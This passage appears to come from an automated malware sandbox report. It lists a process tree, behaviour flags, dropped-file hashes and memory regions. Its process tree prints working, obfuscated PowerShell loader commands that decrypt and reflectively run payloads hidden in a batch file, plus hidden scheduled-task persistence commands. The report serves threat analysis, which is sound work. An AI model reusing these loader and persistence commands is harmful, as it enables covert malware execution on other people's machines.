)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_301_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_301.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_301.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_301.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_301.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_301.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\New.exe"C:\Users\Admin\AppData\Local\Temp\New.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5bc6a86437194bfa626eae49dc94bba2d
SHA13a80cfe1754955ec899c013f5fdc068e193b6962
SHA256284d9cfa3d1ac402c04cbc046c7dc2fef7ef5dc9d739c3806d2f256e4dbf9b0e
SHA512de79790fbf1cce40b0a9b2890024986c9a3dd90c155103296db51dfea1d18ddf868b42f6fd8ba0eabefcb3945c8a2ee8a80ee2cbe07a69f99d40b0838afb4ce3
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\New.exeFilesize
409KB
MD5cf570b21f42f0ce411b7c9961068931e
SHA1f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d
SHA256d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234
SHA512de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywvylc5f.rld.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\startup_str_301.batFilesize
1002KB
MD5f6d5bfaee8a55ff72c7b453fda066d62
SHA17d737d53013990e5d05076b7206e43eb4793fc7f
SHA2563ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
SHA512e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
-
C:\Users\Admin\AppData\Roaming\startup_str_301.vbsFilesize
115B
MD5deec8143631052743e93d5e0a2741c54
SHA143369d421e49028bddce2620e2637c2daecc7382
SHA2561203d2de4d471291c63409f01835f74dfaa320486d9f9705e6d68c28abc4b853
SHA51278642c0dfb1c5258405c86263975ebe9f6edee744b58c6ee3b1a91b27163c451cc69492beddcdc169a377716a140d31eb0b7fe38665b4a376948c956c5939552
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
338B
MD5fa88c90dca47790f22143feecb47d5fe
SHA1437589b0cb20e84ceb460329cd727a509ee7304b
SHA25674ebd2a533693d0719c2f0ae5f36c4396a7b19df67ffd9071f2aab40caf71978
SHA512c9cd52917725ac46186fbda8c488cebb3439ca3540097d58a6f4aeacbba379bf1fa005407e08b69d4476ca6e3172c75e5de6b2fa091c7eaa4c8a06b149f470ea
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD5ed913da46cb8ccd4a57796c6aaec488d
SHA12800a7f724826345bb6c7c00b2640421b676005d
SHA2564a5f559ce00f8fb6817734b15dd5d8998972770e5889f08673e118674301a40c
SHA512b00673889a78f09d9c8717e3ff34f4865510ba65adb916ab03725a4e2246c75adc8dc04441f30c42d34db6d2b777e5939b6b8f5a16f7f4f84d47c1ce62f4038c
-
memory/560-167-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmpFilesize
64KB
-
memory/560-161-0x00000223EE4F0000-0x00000223EE51A000-memory.dmpFilesize
168KB
-
memory/560-166-0x00000223EE4F0000-0x00000223EE51A000-memory.dmpFilesize
168KB
-
memory/640-130-0x000001D693720000-0x000001D69374A000-memory.dmpFilesize
168KB
-
memory/640-131-0x000001D693720000-0x000001D69374A000-memory.dmpFilesize
168KB
-
memory/640-129-0x000001D6936F0000-0x000001D693715000-memory.dmpFilesize
148KB
-
memory/640-136-0x000001D693720000-0x000001D69374A000-memory.dmpFilesize
168KB
-
memory/640-137-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmpFilesize
64KB
-
memory/700-146-0x000002ADE4590000-0x000002ADE45BA000-memory.dmpFilesize
168KB
-
memory/700-147-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmpFilesize
64KB
-
memory/700-141-0x000002ADE4590000-0x000002ADE45BA000-memory.dmpFilesize
168KB
-
memory/900-176-0x000002391B290000-0x000002391B2BA000-memory.dmpFilesize
168KB
-
memory/900-171-0x000002391B290000-0x000002391B2BA000-memory.dmpFilesize
168KB
-
memory/900-177-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmpFilesize
64KB
-
memory/1000-157-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmpFilesize
64KB
-
memory/1000-151-0x000002D71A940000-0x000002D71A96A000-memory.dmpFilesize
168KB
-
memory/1000-156-0x000002D71A940000-0x000002D71A96A000-memory.dmpFilesize
168KB
-
memory/1864-118-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1864-122-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1864-120-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1864-125-0x00007FFDDD7D0000-0x00007FFDDD88D000-memory.dmpFilesize
756KB
-
memory/1864-124-0x00007FFDDED00000-0x00007FFDDEF09000-memory.dmpFilesize
2.0MB
-
memory/1864-119-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1864-117-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1864-126-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1916-116-0x00007FFDDD7D0000-0x00007FFDDD88D000-memory.dmpFilesize
756KB
-
memory/1916-115-0x00007FFDDED00000-0x00007FFDDEF09000-memory.dmpFilesize
2.0MB
-
memory/1916-114-0x000001DE6AF40000-0x000001DE6AF6A000-memory.dmpFilesize
168KB
-
memory/1916-109-0x000001DE6AB90000-0x000001DE6ABB2000-memory.dmpFilesize
136KB
-
memory/2404-35-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-47-0x0000000007A20000-0x0000000007A3E000-memory.dmpFilesize
120KB
-
memory/2404-25-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-34-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-48-0x0000000007A90000-0x0000000007B34000-memory.dmpFilesize
656KB
-
memory/2404-46-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-37-0x00000000711A0000-0x00000000711EC000-memory.dmpFilesize
304KB
-
memory/2404-36-0x0000000007A40000-0x0000000007A74000-memory.dmpFilesize
208KB
-
memory/2404-57-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-54-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-53-0x0000000007DF0000-0x0000000007E01000-memory.dmpFilesize
68KB
-
memory/2404-52-0x0000000007E60000-0x0000000007EF6000-memory.dmpFilesize
600KB
-
memory/2404-51-0x0000000007C50000-0x0000000007C5A000-memory.dmpFilesize
40KB
-
memory/2404-50-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2404-49-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/2888-98-0x0000000000900000-0x000000000096C000-memory.dmpFilesize
432KB
-
memory/3448-79-0x0000000008E60000-0x0000000008ECC000-memory.dmpFilesize
432KB
-
memory/3448-110-0x000000000AA70000-0x000000000AAAC000-memory.dmpFilesize
240KB
-
memory/3448-80-0x0000000008F80000-0x0000000009012000-memory.dmpFilesize
584KB
-
memory/3448-100-0x0000000009130000-0x0000000009142000-memory.dmpFilesize
72KB
-
memory/3448-112-0x000000000AB90000-0x000000000AB9A000-memory.dmpFilesize
40KB
-
memory/4964-21-0x0000000006CA0000-0x0000000006CA8000-memory.dmpFilesize
32KB
-
memory/4964-16-0x00000000062A0000-0x00000000065F7000-memory.dmpFilesize
3.3MB
-
memory/4964-23-0x000000000ABC0000-0x000000000B166000-memory.dmpFilesize
5.6MB
-
memory/4964-22-0x00000000089D0000-0x0000000008AC2000-memory.dmpFilesize
968KB
-
memory/4964-0-0x0000000074FBE000-0x0000000074FBF000-memory.dmpFilesize
4KB
-
memory/4964-19-0x0000000008F90000-0x000000000960A000-memory.dmpFilesize
6.5MB
-
memory/4964-20-0x0000000006D30000-0x0000000006D4A000-memory.dmpFilesize
104KB
-
memory/4964-18-0x0000000006790000-0x00000000067DC000-memory.dmpFilesize
304KB
-
memory/4964-17-0x0000000006740000-0x000000000675E000-memory.dmpFilesize
120KB
-
memory/4964-99-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/4964-6-0x00000000061C0000-0x0000000006226000-memory.dmpFilesize
408KB
-
memory/4964-7-0x0000000006230000-0x0000000006296000-memory.dmpFilesize
408KB
-
memory/4964-5-0x00000000059C0000-0x00000000059E2000-memory.dmpFilesize
136KB
-
memory/4964-4-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/4964-2-0x0000000005AA0000-0x00000000060CA000-memory.dmpFilesize
6.2MB
-
memory/4964-3-0x0000000074FB0000-0x0000000075761000-memory.dmpFilesize
7.7MB
-
memory/4964-1-0x0000000005390000-0x00000000053C6000-memory.dmpFilesize
216KB